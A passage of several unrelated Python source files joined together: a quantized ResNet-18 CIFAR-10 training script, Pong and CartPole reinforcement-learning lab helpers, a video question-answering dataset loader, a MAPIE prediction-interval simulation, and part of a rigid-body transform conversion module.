        net += residual  # identity shortcut (see NOTE above)
        return tf.nn.relu(net)
def resnet18(x, y_, reuse, is_train, bitW, bitA):
    """Quantized ResNet-18-style graph; returns (network, cost, accuracy).

    Builds everything under the shared "resnet18" variable scope, so a second
    call with ``reuse=True`` creates an evaluation graph over the same
    weights (BN in inference mode via ``is_train=False``).

    NOTE(review): with the 24x24 crops fed by this script, the feature map
    reaching res_pool2 is smaller than 7x7, so the VALID mean-pool may fail;
    the 7x7 pool assumes ImageNet-sized (224x224) inputs -- confirm intended
    input size.
    """
    with tf.variable_scope("resnet18", reuse=reuse):
        net = tl.layers.InputLayer(x, name='input')
        # Stem: 7x7/2 quantized conv followed by 3x3/2 max-pool.
        net = tl.layers.QuanConv2dWithBN(net, 64, (7,7), (2,2), padding='SAME', act=tf.nn.relu, is_train=is_train, bitW=bitW, bitA=bitA, name='res_quan1')
        net = tl.layers.MaxPool2d(net, (3,3), (2,2), padding='SAME', name='res_pool1')
        # Four stages of two residual blocks; the first block of stages 2-4
        # halves resolution (stride 2) and doubles the channel count.
        net = block(net, 64, 1, reuse, is_train, bitW, bitA, name='res_block1_1')
        net = block(net, 64, 1, reuse, is_train, bitW, bitA, name='res_block1_2')
        net = block(net, 128, 2, reuse, is_train, bitW, bitA, name='res_block2_1')
        net = block(net, 128, 1, reuse, is_train, bitW, bitA, name='res_block2_2')
        net = block(net, 256, 2, reuse, is_train, bitW, bitA, name='res_block3_1')
        net = block(net, 256, 1, reuse, is_train, bitW, bitA, name='res_block3_2')
        net = block(net, 512, 2, reuse, is_train, bitW, bitA, name='res_block4_1')
        net = block(net, 512, 1, reuse, is_train, bitW, bitA, name='res_block4_2')
        # Global average pool and quantized 1000-way classifier head.
        net = tl.layers.MeanPool2d(net, (7,7), (1,1), padding='VALID', name='res_pool2')
        net = tl.layers.QuanDenseLayer(net, 1000, act=None, bitW=bitW, bitA=bitA, name='res_output')

        y = net.outputs
        ce = tl.cost.cross_entropy(y, y_, name='cost')
        # L2 weight decay collected from variables whose name matches 'relu/W'.
        L2 = 0
        for p in tl.layers.get_variables_with_name('relu/W', True, True):
            L2 += tf.contrib.layers.l2_regularizer(0.004)(p)
        cost = ce + L2

        # correct_prediction = tf.equal(tf.argmax(tf.nn.softmax(y), 1), y_)
        correct_prediction = tf.equal(tf.cast(tf.argmax(y, 1), tf.int64), y_)
        acc = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))

        return net, cost, acc
def distort_fn(x, is_train=False):
    """Crop (randomly when training) and standardize one CIFAR-10 image.

    Training additionally applies a random horizontal flip and a random
    brightness change.
    """
    x = tl.prepro.crop(x, 24, 24, is_random=is_train)
    if is_train:
        x = tl.prepro.flip_axis(x, axis=1, is_random=True)
        x = tl.prepro.brightness(x, gamma=0.1, gain=1, is_random=True)
    # Standardize; the 1e-5 floor avoids dividing by zero on flat images.
    return (x - np.mean(x)) / max(np.std(x), 1e-5)
# Inputs are 24x24 crops produced by distort_fn; labels are int64 class ids.
x = tf.placeholder(dtype=tf.float32, shape=[None, 24, 24, 3], name='x')
y_ = tf.placeholder(dtype=tf.int64, shape=[None], name='y_')

# Two graph instances over shared weights: one training graph and one
# evaluation graph (reuse=True, is_train=False).
network, cost, _ = resnet18(x, y_, False, True, bitW=bitW, bitA=bitA)
_, cost_test, acc = resnet18(x, y_, True, False, bitW=bitW, bitA=bitA)

# train
n_epoch = 50000
learning_rate = 0.0001  # 0.01 for alex
print_freq = 1
batch_size = 128

train_op = tf.train.AdamOptimizer(learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-08,
                                  use_locking=False).minimize(cost)

sess.run(tf.global_variables_initializer())

network.print_params(False)
network.print_layers()

print(' learning_rate: %f' % learning_rate)
print(' batch_size: %d' % batch_size)
print(' bitW: %d, bitA: %d' % (bitW, bitA))

for epoch in range(n_epoch):
    start_time = time.time()
    for X_train_a, y_train_a in tl.iterate.minibatches(X_train, y_train, batch_size, shuffle=True):
        X_train_a = tl.prepro.threading_data(X_train_a, fn=distort_fn, is_train=True)  # data augmentation for training
        sess.run(train_op, feed_dict={x: X_train_a, y_: y_train_a})

    # Evaluate on the full test set every print_freq epochs.
    if epoch + 1 == 1 or (epoch + 1) % print_freq == 0:
        print("Epoch %d of %d took %fs" % (epoch + 1, n_epoch, time.time() - start_time))
        test_loss, test_acc, n_batch = 0, 0, 0
        for X_test_a, y_test_a in tl.iterate.minibatches(X_test, y_test, batch_size, shuffle=False):
            X_test_a = tl.prepro.threading_data(X_test_a, fn=distort_fn, is_train=False)  # central crop
            err, ac = sess.run([cost_test, acc], feed_dict={x: X_test_a, y_: y_test_a})
            test_loss += err
            test_acc += ac
            n_batch += 1
        print(" test loss: %f" % (test_loss / n_batch))
        print(" test acc: %f" % (test_acc / n_batch))
|
<filename>mitdeeplearning/lab3.py<gh_stars>1000+
import io
import base64
from IPython.display import HTML
import gym
import numpy as np
import cv2
def play_video(filename, width=None):
    """Return an IPython HTML element embedding an MP4 file inline.

    Parameters
    ----------
    filename : str
        Path to the MP4 file to embed.
    width : int, optional
        Pixel width for the <video> tag; omitted when None.
    """
    # Fix: the original left the file handle open; use a context manager.
    with io.open(filename, 'r+b') as video_file:
        encoded = base64.b64encode(video_file.read())
    video_width = 'width="' + str(width) + '"' if width is not None else ''
    embedded = HTML(data='''
        <video controls {0}>
            <source src="data:video/mp4;base64,{1}" type="video/mp4" />
        </video>'''.format(video_width, encoded.decode('ascii')))
    return embedded
def preprocess_pong(image):
    """Crop, downsample, binarize and dilate a raw Pong frame.

    Returns a float array with a trailing channel axis where paddles/ball
    are 1 and background is 0.  Fixes applied: the ``::2`` downsampling
    slices had been corrupted into invalid tokens, and ``np.float`` (removed
    in NumPy 1.24; it was an alias of the builtin float, i.e. float64) is
    replaced by ``np.float64``.
    """
    I = image[35:195]  # Crop the playfield
    I = I[::2, ::2, 0]  # Downsample width and height by a factor of 2
    I[I == 144] = 0  # Remove background type 1
    I[I == 109] = 0  # Remove background type 2
    I[I != 0] = 1  # Set remaining elements (paddles, ball, etc.) to 1
    # Thicken the sparse foreground pixels so they survive downsampling.
    I = cv2.dilate(I, np.ones((3, 3), np.uint8), iterations=1)
    I = I[::2, ::2, np.newaxis]  # Second 2x downsample; add channel axis
    return I.astype(np.float64)
def pong_change(prev, curr):
    """Return the per-pixel difference between two preprocessed Pong frames."""
    # I = (I - I.min()) / (I.max() - I.min() + 1e-10)
    return preprocess_pong(prev) - preprocess_pong(curr)
class Memory:
    """Episode buffer: parallel lists of observations, actions and rewards."""

    def __init__(self):
        # Start from an empty buffer.
        self.clear()

    def clear(self):
        """Reset/restart the memory buffer to three empty lists."""
        self.observations, self.actions, self.rewards = [], [], []

    def add_to_memory(self, new_observation, new_action, new_reward):
        """Append one (observation, action, reward) step to the buffer."""
        for store, item in ((self.observations, new_observation),
                            (self.actions, new_action),
                            (self.rewards, new_reward)):
            store.append(item)
def aggregate_memories(memories):
    """Merge several Memory buffers into a single Memory, preserving order."""
    combined = Memory()
    for mem in memories:
        for obs, act, rew in zip(mem.observations, mem.actions, mem.rewards):
            combined.add_to_memory(obs, act, rew)
    return combined
def parallelized_collect_rollout(batch_size, envs, model, choose_action):
    """Roll out one episode in each of ``batch_size`` environments in lockstep.

    All environments that are not yet done are stepped together so that
    ``choose_action`` can run the model on one batch of frame-difference
    observations.  Returns one Memory per environment containing
    (diff_frame, action, reward) steps.
    """
    assert len(envs) == batch_size, "Number of parallel environments must be equal to the batch size."

    memories = [Memory() for _ in range(batch_size)]
    next_observations = [single_env.reset() for single_env in envs]
    previous_frames = [obs for obs in next_observations]
    done = [False] * batch_size
    rewards = [0] * batch_size

    while True:
        current_frames = [obs for obs in next_observations]
        # The policy input is the change between consecutive frames.
        diff_frames = [pong_change(prev, curr) for (prev, curr) in zip(previous_frames, current_frames)]

        # Query the model only for environments that are still running.
        diff_frames_not_done = [diff_frames[b] for b in range(batch_size) if not done[b]]
        actions_not_done = choose_action(model, np.array(diff_frames_not_done), single=False)

        # Scatter the predicted actions back to their environment slots.
        actions = [None] * batch_size
        ind_not_done = 0
        for b in range(batch_size):
            if not done[b]:
                actions[b] = actions_not_done[ind_not_done]
                ind_not_done += 1

        # Step each live environment and record the transition.
        for b in range(batch_size):
            if done[b]:
                continue
            next_observations[b], rewards[b], done[b], info = envs[b].step(actions[b])
            previous_frames[b] = current_frames[b]
            memories[b].add_to_memory(diff_frames[b], actions[b], rewards[b])

        if all(done):
            break

    return memories
def save_video_of_model(model, env_name, suffix=""):
    """Run ``model`` greedily in a gym environment and record it to an MP4.

    Supports "CartPole" (raw observation input) and "Pong" (frame-difference
    input).  Returns the written filename.
    """
    import skvideo.io
    from pyvirtualdisplay import Display

    # Headless rendering: gym's rgb_array mode needs a (virtual) display.
    display = Display(visible=0, size=(400, 300))
    display.start()

    env = gym.make(env_name)
    obs = env.reset()
    prev_obs = obs

    filename = env_name + suffix + ".mp4"
    output_video = skvideo.io.FFmpegWriter(filename)

    counter = 0
    done = False
    while not done:
        frame = env.render(mode='rgb_array')
        output_video.writeFrame(frame)

        # Build the model input that matches the training regime.
        if "CartPole" in env_name:
            input_obs = obs
        elif "Pong" in env_name:
            input_obs = pong_change(prev_obs, obs)
        else:
            raise ValueError(f"Unknown env for saving: {env_name}")

        # Greedy action: argmax over the model's outputs.
        action = model(np.expand_dims(input_obs, 0)).numpy().argmax()

        prev_obs = obs
        obs, reward, done, info = env.step(action)
        counter += 1

    output_video.close()
    print("Successfully saved {} frames into {}!".format(counter, filename))
    return filename
def save_video_of_memory(memory, filename, size=(512, 512)):
    """Write the observations stored in ``memory`` to ``filename`` as video."""
    import skvideo.io

    writer = skvideo.io.FFmpegWriter(filename)
    for obs in memory.observations:
        # Scale up by 255 and resize so the frames are visible.
        writer.writeFrame(cv2.resize(255 * obs, size))
    writer.close()
    return filename
|
"""
Copyright (c) Microsoft Corporation.
Licensed under the MIT license.
Video QA dataset
"""
import random
from torch.utils.data import Dataset
import torch
from torch.nn.utils.rnn import pad_sequence
from toolz.sandbox import unzip
import horovod.torch as hvd
from .data import (VideoFeatSubTokDataset, QaQueryTokLmdb,
get_ids_and_lens, video_collate, _check_ngpu,
txt_input_collate)
import math
class VideoQaDataset(Dataset):
    """Video question-answering dataset.

    Pairs video features/subtitles from ``video_db`` with QA examples from
    ``query_db``.  Samples are indexed either by query (``sampled_by_q=True``)
    or by video, in which case up to ``max_num_query`` queries are drawn per
    video.
    """

    def __init__(self, video_ids, video_db, query_db, max_num_query=5,
                 sampled_by_q=True):
        assert isinstance(query_db, QaQueryTokLmdb)
        assert isinstance(video_db, VideoFeatSubTokDataset)
        self.video_db = video_db
        self.query_db = query_db
        # Convenience views over the video DB.
        self.vid2dur = self.video_db.vid2dur
        self.vid2idx = self.video_db.vid2idx
        self.max_clip_len = video_db.txt_db.max_clip_len
        # Seconds per frame; used by get_st_ed_label below.
        self.frame_interval = video_db.img_db.frame_interval
        self.max_num_query = max_num_query
        self.sampled_by_q = sampled_by_q
        self.vids = video_ids
        if sampled_by_q:
            self.lens, self.qids = get_ids_and_lens(query_db)
            # FIXME
            if _check_ngpu() > 1:
                # partition data by rank
                self.qids = self.qids[hvd.rank()::hvd.size()]
                self.lens = self.lens[hvd.rank()::hvd.size()]
        else:
            # FIXME
            if _check_ngpu() > 1:
                # partition data by rank
                self.vids = self.vids[hvd.rank()::hvd.size()]
            self.lens = [video_db.txt_db.id2len[vid] for vid in self.vids]

    def getids(self, i):
        # Map dataset index i to (video id, list of question ids).
        if not self.sampled_by_q:
            vid = self.vids[i]
            # TVR video loss assumes fix number of queries
            qids = self.query_db.video2query[vid][:self.max_num_query]
            if len(qids) < self.max_num_query:
                # Pad by re-sampling from the existing qids.
                # NOTE(review): random.sample raises ValueError when the
                # deficit exceeds len(qids); this assumes at most a 2x
                # shortfall -- confirm against the data.
                qids += random.sample(qids, self.max_num_query - len(qids))
        else:
            qids = [self.qids[i]]
            vid = self.query_db.query2video[qids[0]]
        return vid, qids

    def __getitem__(self, i):
        """Assemble all QA inputs for one (video, queries) sample.

        Returns a tuple of parallel lists (one entry per question/answer):
        video+QA model inputs, QA token ids, QA attention masks, video ids,
        answer targets, and (start, end) frame-index targets.
        """
        vid, qids = self.getids(i)
        video_inputs = self.video_db.__getitem__(vid)
        (frame_level_input_ids, frame_level_v_feats,
         frame_level_attn_masks,
         clip_level_v_feats, clip_level_attn_masks, num_subs,
         sub_idx2frame_idx) = video_inputs
        nframes = len(clip_level_v_feats)

        all_vids = []
        all_targets = []
        all_ts_targets = []
        all_qa_input_ids = []
        all_qa_attn_masks = []
        all_video_qa_inputs = []
        for qid in qids:
            example = self.query_db[qid]
            # Answer index; -1 marks "no label" (e.g. test split).
            if example['target'] is not None:
                target = torch.LongTensor([example['target']])
            else:
                target = torch.LongTensor([-1])
            # Temporal grounding labels as frame indices; (-1, -1) if absent.
            if example['ts'] is not None:
                st_idx, ed_idx = self.get_st_ed_label(
                    example['ts'], max_idx=nframes-1)
                ts_target = torch.LongTensor(
                    [st_idx, ed_idx])
            else:
                ts_target = torch.LongTensor([-1, -1])
            # input_ids[0] is the question; the rest are answer candidates.
            input_ids = example["input_ids"]
            q_input_ids = input_ids[0]
            for a_input_ids in input_ids[1:]:
                f_sub_qa_input_ids = []
                f_sub_qa_attn_masks = []
                # [SEP] question [SEP] answer
                curr_qa_input_id = torch.tensor(
                    [self.query_db.sep] + q_input_ids + [
                        self.query_db.sep] + a_input_ids)
                curr_qa_attn_masks = torch.tensor([1]*len(curr_qa_input_id))
                all_qa_input_ids.append(curr_qa_input_id)
                all_qa_attn_masks.append(curr_qa_attn_masks)
                # Append the QA pair to every frame-level subtitle sequence.
                for f_sub_input_ids, f_attn_masks in zip(
                        frame_level_input_ids, frame_level_attn_masks):
                    curr_f_sub_qa_input_ids = torch.cat((
                        f_sub_input_ids, curr_qa_input_id))
                    curr_f_sub_qa_attn_masks = torch.cat((
                        f_attn_masks, curr_qa_attn_masks))
                    f_sub_qa_input_ids.append(curr_f_sub_qa_input_ids)
                    f_sub_qa_attn_masks.append(curr_f_sub_qa_attn_masks)
                curr_video_qa_inputs = (
                    f_sub_qa_input_ids, frame_level_v_feats,
                    f_sub_qa_attn_masks,
                    clip_level_v_feats, clip_level_attn_masks, num_subs,
                    sub_idx2frame_idx)
                all_video_qa_inputs.append(curr_video_qa_inputs)
            all_vids.append(vid)
            all_targets.append(target)
            all_ts_targets.append(ts_target)
        out = (all_video_qa_inputs, all_qa_input_ids, all_qa_attn_masks,
               all_vids, all_targets, all_ts_targets)
        return out

    def __len__(self):
        # Dataset length depends on the sampling mode chosen in __init__.
        if self.sampled_by_q:
            return len(self.qids)
        return len(self.vids)

    def get_st_ed_label(self, ts, max_idx):
        """
        Args:
            ts: [st (float), ed (float)] in seconds, ed > st
            max_idx: length of the video

        Returns:
            [st_idx, ed_idx]: int,

        Given ts = [3.2, 7.6], st_idx = 2, ed_idx = 6,
        clips should be indexed as [2: 6),
        the translated back ts should be [3:9].
        # TODO which one is better, [2: 5] or [2: 6)
        """
        try:
            # ts arrives as a "st-ed" string here (split on '-').
            ts = ts.split("-")
            st = float(ts[0])
            ed = float(ts[1])
            st_idx = min(math.floor(st/self.frame_interval), max_idx)
            # Guarantee ed_idx > st_idx while clamping to the video length.
            ed_idx = min(max(math.ceil(ed/self.frame_interval)-1,
                             st_idx+1), max_idx)
        except Exception:
            # Malformed timestamps degrade to the "no label" sentinel.
            st_idx, ed_idx = -1, -1
        return st_idx, ed_idx
def video_qa_collate(inputs):
    """Flatten per-sample lists from VideoQaDataset into one training batch."""
    (video_qa_inputs, qa_input_ids, qa_attn_masks,
     vids, target, ts_target) = map(list, unzip(inputs))

    # Concatenate the per-sample model inputs and QA token tensors.
    all_video_qa_inputs = []
    all_qa_input_ids, all_qa_attn_masks = [], []
    for sample_inputs, sample_ids, sample_masks in zip(
            video_qa_inputs, qa_input_ids, qa_attn_masks):
        all_video_qa_inputs.extend(sample_inputs)
        all_qa_input_ids.extend(sample_ids)
        all_qa_attn_masks.extend(sample_masks)

    # Concatenate the label tensors the same way.
    all_target, all_ts_target = [], []
    for sample_target, sample_ts in zip(target, ts_target):
        all_target.extend(sample_target)
        all_ts_target.extend(sample_ts)

    batch = video_collate(all_video_qa_inputs)
    batch["targets"] = pad_sequence(
        all_target, batch_first=True, padding_value=-1)
    batch["ts_targets"] = pad_sequence(
        all_ts_target, batch_first=True, padding_value=-1)
    input_ids, pos_ids, attn_masks = txt_input_collate(
        all_qa_input_ids, all_qa_attn_masks)
    batch['qa_input_ids'] = input_ids
    batch['qa_pos_ids'] = pos_ids
    batch['qa_attn_masks'] = attn_masks
    return batch
class VideoQaEvalDataset(VideoQaDataset):
    """Evaluation variant that also yields the question ids for each sample.

    NOTE(review): ``getids`` is called here and again inside
    ``super().__getitem__``; when ``sampled_by_q`` is False and a video has
    fewer than ``max_num_query`` queries, getids pads with ``random.sample``,
    so the two calls can disagree on qids -- confirm this is acceptable for
    evaluation (or that eval always runs with ``sampled_by_q=True``).
    """

    def __getitem__(self, i):
        vid, qids = self.getids(i)
        outs = super().__getitem__(i)
        return qids, outs
def video_qa_eval_collate(inputs):
    """Collate evaluation samples, carrying question ids alongside the batch."""
    all_qids = []
    tensor_batches = []
    for sample_qids, sample_tensors in inputs:
        all_qids.extend(sample_qids)
        tensor_batches.append(sample_tensors)
    batch = video_qa_collate(tensor_batches)
    batch['qids'] = all_qids
    return batch
|
"""
============================================================
Reproducing the simulations from Foygel-Barber et al. (2020)
============================================================
:class:`mapie.estimators.MapieRegressor` is used to investigate
the coverage level and the prediction interval width as function
of the dimension using simulated data points as introduced in
Foygel-Barber et al. (2020).
This simulation generates several times linear data with random noise
whose signal-to-noise is equal to 10 and for several given dimensions.
Here we use MAPIE, with a LinearRegression base model, to estimate the width
means and the coverage levels of the prediction intervals estimated by all the
available methods as function of the dataset dimension.
We then show the prediction interval coverages and widths as a function of the
dimension values for selected methods, with standard errors estimated from the different trials.
This simulation is carried out to emphasize the instability of the prediction
intervals estimated by the Jackknife method when the dataset dimension is
equal to the number of training samples (here 100).
"""
from typing import List, Dict
import numpy as np
from sklearn.linear_model import LinearRegression
from matplotlib import pyplot as plt
from mapie.estimators import MapieRegressor
from mapie.metrics import coverage_score
def PIs_vs_dimensions(
    methods: List[str],
    alpha: float,
    n_trial: int,
    dimensions: List[int]
) -> Dict[str, Dict[int, Dict[str, np.ndarray]]]:
    """
    Compute the prediction intervals for a linear regression problem.
    Function adapted from Foygel-Barber et al. (2020).

    It generates several times linear data with random noise whose
    signal-to-noise is equal to 10 and for several given dimensions, given by
    the dimensions list.

    Here we use MAPIE, with a LinearRegression base model, to estimate the
    width means and the coverage levels of the prediction intervals estimated
    by all the available methods as function of the dataset dimension.

    This simulation is carried out to emphasize the instability of the
    prediction intervals estimated by the Jackknife method when the dataset
    dimension is equal to the number of training samples (here 100).

    Parameters
    ----------
    methods : List[str]
        List of methods for estimating prediction intervals.
    alpha : float
        1 - (target coverage level).
    n_trial : int
        Number of trials for each dimension for estimating
        prediction intervals. For each trial, a new random noise is generated.
    dimensions : List[int]
        List of dimension values of input data.

    Returns
    -------
    Dict[str, Dict[int, Dict[str, np.ndarray]]]
        Prediction interval widths and coverages for each method, trial,
        and dimension value.
    """
    n_train = 100
    n_test = 100
    SNR = 10
    # Pre-allocate one (coverage, width_mean) array pair per method/dimension.
    results: Dict[str, Dict[int, Dict[str, np.ndarray]]] = {
        method: {
            dimension: {
                "coverage": np.empty(n_trial),
                "width_mean": np.empty(n_trial)
            } for dimension in dimensions
        } for method in methods
    }
    for dimension in dimensions:
        for trial in range(n_trial):
            # Scale beta so the signal-to-noise ratio equals SNR
            # (noise has unit variance).
            beta = np.random.normal(size=dimension)
            beta_norm = np.sqrt((beta**2).sum())
            beta = beta/beta_norm*np.sqrt(SNR)
            X_train = np.random.normal(size=(n_train, dimension))
            noise_train = np.random.normal(size=n_train)
            noise_test = np.random.normal(size=n_test)
            y_train = X_train.dot(beta) + noise_train
            X_test = np.random.normal(size=(n_test, dimension))
            y_test = X_test.dot(beta) + noise_test

            for method in methods:
                mapie = MapieRegressor(
                    LinearRegression(),
                    alpha=alpha,
                    method=method,
                    n_splits=5,
                    shuffle=False,
                    return_pred="ensemble"
                )
                mapie.fit(X_train, y_train)
                # predict returns columns (prediction, lower, upper).
                y_preds = mapie.predict(X_test)
                results[method][dimension]["coverage"][trial] = coverage_score(
                    y_test, y_preds[:, 1], y_preds[:, 2]
                )
                results[method][dimension]["width_mean"][trial] = (
                    y_preds[:, 2] - y_preds[:, 1]
                ).mean()
    return results
def plot_simulation_results(
    results: Dict[str, Dict[int, Dict[str, np.ndarray]]],
    title: str
) -> None:
    """
    Show the prediction interval coverages and widths as function of
    dimension values for selected methods with standard error
    given by different trials.

    NOTE(review): this function reads the module-level globals ``ntrial``
    (for the standard errors) and ``alpha`` (for the target-coverage line)
    instead of taking them as parameters -- it only works when called from
    the script below; consider passing them explicitly.

    Parameters
    ----------
    results : Dict[str, Dict[int, Dict[str, np.ndarray]]]
        Prediction interval widths and coverages for each method, trial,
        and dimension value.
    title : str
        Title of the plot.
    """
    fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5))
    plt.rcParams.update({"font.size": 14})
    plt.suptitle(title)
    for method in results:
        dimensions = list(results[method].keys())
        n_dim = len(dimensions)
        coverage_mean, coverage_SE, width_mean, width_SE = (
            np.zeros(n_dim), np.zeros(n_dim), np.zeros(n_dim), np.zeros(n_dim)
        )
        # Mean and standard error across trials, per dimension.
        for idim, dimension in enumerate(dimensions):
            coverage_mean[idim] = results[method][dimension]["coverage"].mean()
            coverage_SE[idim] = results[method][dimension]["coverage"].std()/np.sqrt(ntrial)
            width_mean[idim] = results[method][dimension]["width_mean"].mean()
            width_SE[idim] = results[method][dimension]["width_mean"].std()/np.sqrt(ntrial)
        # Coverage curve with a +/- 1 SE band.
        ax1.plot(dimensions, coverage_mean, label=method)
        ax1.fill_between(
            dimensions, coverage_mean - coverage_SE, coverage_mean + coverage_SE, alpha=0.25
        )
        # Interval-width curve with a +/- 1 SE band.
        ax2.plot(dimensions, width_mean, label=method)
        ax2.fill_between(
            dimensions, width_mean - width_SE, width_mean + width_SE, alpha=0.25
        )
    # Dashed line marks the target coverage level 1 - alpha.
    ax1.axhline(1 - alpha, linestyle="dashed", c="k")
    ax1.set_ylim(0.0, 1.0)
    ax1.set_xlabel("Dimension d")
    ax1.set_ylabel("Coverage")
    ax1.legend()
    ax2.set_ylim(0, 20)
    ax2.set_xlabel("Dimension d")
    ax2.set_ylabel("Interval width")
    ax2.legend()
# Experiment configuration: compare selected MAPIE methods over a grid of
# input dimensions at a 90% target coverage level (alpha = 0.1).
methods = [
    "naive",
    "cv",
    "cv_plus"
]
alpha = 0.1
# NOTE(review): with a single trial, np.std over one value is 0, so the
# standard-error bands drawn by plot_simulation_results collapse to zero.
ntrial = 1
dimensions = np.arange(10, 150, 10)
results = PIs_vs_dimensions(methods, alpha, ntrial, dimensions)
plot_simulation_results(results, title="Coverages and interval widths")
|
"""Conversions between transform representations."""
import math
import numpy as np
from ._utils import (check_transform, check_pq, check_screw_axis,
check_screw_parameters, check_exponential_coordinates,
check_screw_matrix, check_transform_log,
check_dual_quaternion)
from ..rotations import (
matrix_from_quaternion, quaternion_from_matrix, axis_angle_from_matrix,
matrix_from_axis_angle, cross_product_matrix, q_conj,
concatenate_quaternions, axis_angle_from_quaternion, norm_angle, eps)
def transform_from(R, p, strict_check=True):
    """Build a homogeneous transform from a rotation matrix and a translation.

    Parameters
    ----------
    R : array-like, shape (3, 3)
        Rotation matrix

    p : array-like, shape (3,)
        Translation

    strict_check : bool, optional (default: True)
        Raise a ValueError if the transformation matrix is not numerically
        close enough to a real transformation matrix. Otherwise we print a
        warning.

    Returns
    -------
    A2B : array-like, shape (4, 4)
        Transform from frame A to frame B
    """
    # Start from the identity, install the rotation, then the translation.
    # Validation is skipped (check=False) because the parts are set directly.
    with_rotation = rotate_transform(
        np.eye(4), R, strict_check=strict_check, check=False)
    return translate_transform(
        with_rotation, p, strict_check=strict_check, check=False)
def translate_transform(A2B, p, strict_check=True, check=True):
    """Set the translation part of a transformation matrix.

    Parameters
    ----------
    A2B : array-like, shape (4, 4)
        Transform from frame A to frame B

    p : array-like, shape (3,)
        Translation

    strict_check : bool, optional (default: True)
        Raise a ValueError if the transformation matrix is not numerically
        close enough to a real transformation matrix. Otherwise we print a
        warning.

    check : bool, optional (default: True)
        Check if transformation matrix is valid

    Returns
    -------
    A2B : array-like, shape (4, 4)
        Transform from frame A to frame B
    """
    if check:
        A2B = check_transform(A2B, strict_check=strict_check)
    # Work on a copy so the caller's matrix is never mutated.
    result = A2B.copy()
    result[:3, -1] = p
    return result
def rotate_transform(A2B, R, strict_check=True, check=True):
    """Set the rotation part of a transformation matrix.

    Parameters
    ----------
    A2B : array-like, shape (4, 4)
        Transform from frame A to frame B

    R : array-like, shape (3, 3)
        Rotation matrix

    strict_check : bool, optional (default: True)
        Raise a ValueError if the transformation matrix is not numerically
        close enough to a real transformation matrix. Otherwise we print a
        warning.

    check : bool, optional (default: True)
        Check if transformation matrix is valid

    Returns
    -------
    A2B : array-like, shape (4, 4)
        Transform from frame A to frame B
    """
    if check:
        A2B = check_transform(A2B, strict_check=strict_check)
    # Work on a copy so the caller's matrix is never mutated.
    result = A2B.copy()
    result[:3, :3] = R
    return result
def pq_from_transform(A2B, strict_check=True):
    """Compute position and quaternion from transformation matrix.

    Parameters
    ----------
    A2B : array-like, shape (4, 4)
        Transformation matrix from frame A to frame B
    strict_check : bool, optional (default: True)
        Raise a ValueError if the transformation matrix is not numerically
        close enough to a real transformation matrix. Otherwise we print a
        warning.

    Returns
    -------
    pq : array, shape (7,)
        Position and orientation quaternion: (x, y, z, qw, qx, qy, qz)
    """
    A2B = check_transform(A2B, strict_check=strict_check)
    position = A2B[:3, 3]
    orientation = quaternion_from_matrix(A2B[:3, :3])
    return np.hstack((position, orientation))
def transform_from_pq(pq):
    """Compute transformation matrix from position and quaternion.

    Parameters
    ----------
    pq : array-like, shape (7,)
        Position and orientation quaternion: (x, y, z, qw, qx, qy, qz)

    Returns
    -------
    A2B : array, shape (4, 4)
        Transformation matrix from frame A to frame B
    """
    pq = check_pq(pq)
    position, quaternion = pq[:3], pq[3:]
    return transform_from(matrix_from_quaternion(quaternion), position)
def screw_parameters_from_screw_axis(screw_axis):
    """Compute screw parameters from screw axis.

    Note that there is not just one solution since q can be any point on the
    screw axis. We select q so that it is orthogonal to s_axis.

    Parameters
    ----------
    screw_axis : array-like, shape (6,)
        Screw axis described by 6 values
        (omega_1, omega_2, omega_3, v_1, v_2, v_3),
        where the first 3 components are related to rotation and the last 3
        components are related to translation.

    Returns
    -------
    q : array, shape (3,)
        Vector to a point on the screw axis that is orthogonal to s_axis
    s_axis : array, shape (3,)
        Unit direction vector of the screw axis
    h : float
        Pitch of the screw. The pitch is the ratio of translation and rotation
        of the screw axis. Infinite pitch indicates pure translation.
    """
    screw_axis = check_screw_axis(screw_axis)
    omega = screw_axis[:3]
    v = screw_axis[3:]
    if abs(np.linalg.norm(omega)) < np.finfo(float).eps:
        # Pure translation: the direction comes from v, the point q is
        # arbitrary (origin), and the pitch is infinite.
        return np.zeros(3), v, np.inf
    s_axis = omega
    h = omega.dot(v)
    # Moment of the axis about the origin after removing the pitch component.
    moment = v - h * s_axis
    q = np.cross(s_axis, moment)
    return q, s_axis, h
def screw_axis_from_screw_parameters(q, s_axis, h):
    """Compute screw axis representation from screw parameters.

    Parameters
    ----------
    q : array-like, shape (3,)
        Vector to a point on the screw axis
    s_axis : array-like, shape (3,)
        Direction vector of the screw axis
    h : float
        Pitch of the screw. The pitch is the ratio of translation and rotation
        of the screw axis. Infinite pitch indicates pure translation.

    Returns
    -------
    screw_axis : array, shape (6,)
        Screw axis described by 6 values
        (omega_1, omega_2, omega_3, v_1, v_2, v_3),
        where the first 3 components are related to rotation and the last 3
        components are related to translation.
    """
    q, s_axis, h = check_screw_parameters(q, s_axis, h)
    if not np.isinf(h):
        # v combines the moment of the axis (q x s) and the pitch term h*s.
        return np.r_[s_axis, np.cross(q, s_axis) + h * s_axis]
    # Infinite pitch: pure translation along s_axis, no rotation component.
    return np.r_[0.0, 0.0, 0.0, s_axis]
def screw_axis_from_exponential_coordinates(Stheta):
    """Compute screw axis and theta from exponential coordinates.

    Parameters
    ----------
    Stheta : array-like, shape (6,)
        Exponential coordinates of transformation:
        S * theta = (omega_1, omega_2, omega_3, v_1, v_2, v_3) * theta,
        where the first 3 components are related to rotation and the last 3
        components are related to translation. Theta is the rotation angle
        and h * theta the translation. Theta should be >= 0. Negative rotations
        will be represented by a negative screw axis instead. This is relevant
        if you want to recover theta from exponential coordinates.

    Returns
    -------
    screw_axis : array, shape (6,)
        Screw axis described by 6 values
        (omega_1, omega_2, omega_3, v_1, v_2, v_3),
        where the first 3 components are related to rotation and the last 3
        components are related to translation.
    theta : float
        Parameter of the transformation: theta is the angle of rotation
        and h * theta the translation.
    """
    Stheta = check_exponential_coordinates(Stheta)
    # theta is the rotation magnitude; for a pure translation fall back to
    # the translation magnitude instead.
    theta = np.linalg.norm(Stheta[:3])
    if theta < np.finfo(float).eps:
        theta = np.linalg.norm(Stheta[3:])
    if theta < np.finfo(float).eps:
        # Identity transformation: no unique screw axis exists.
        return np.zeros(6), 0.0
    return Stheta / theta, theta
def screw_axis_from_screw_matrix(screw_matrix):
    """Compute screw axis from screw matrix.

    Parameters
    ----------
    screw_matrix : array-like, shape (4, 4)
        A screw matrix consists of a cross-product matrix that represents an
        axis of rotation, a translation, and a row of zeros.

    Returns
    -------
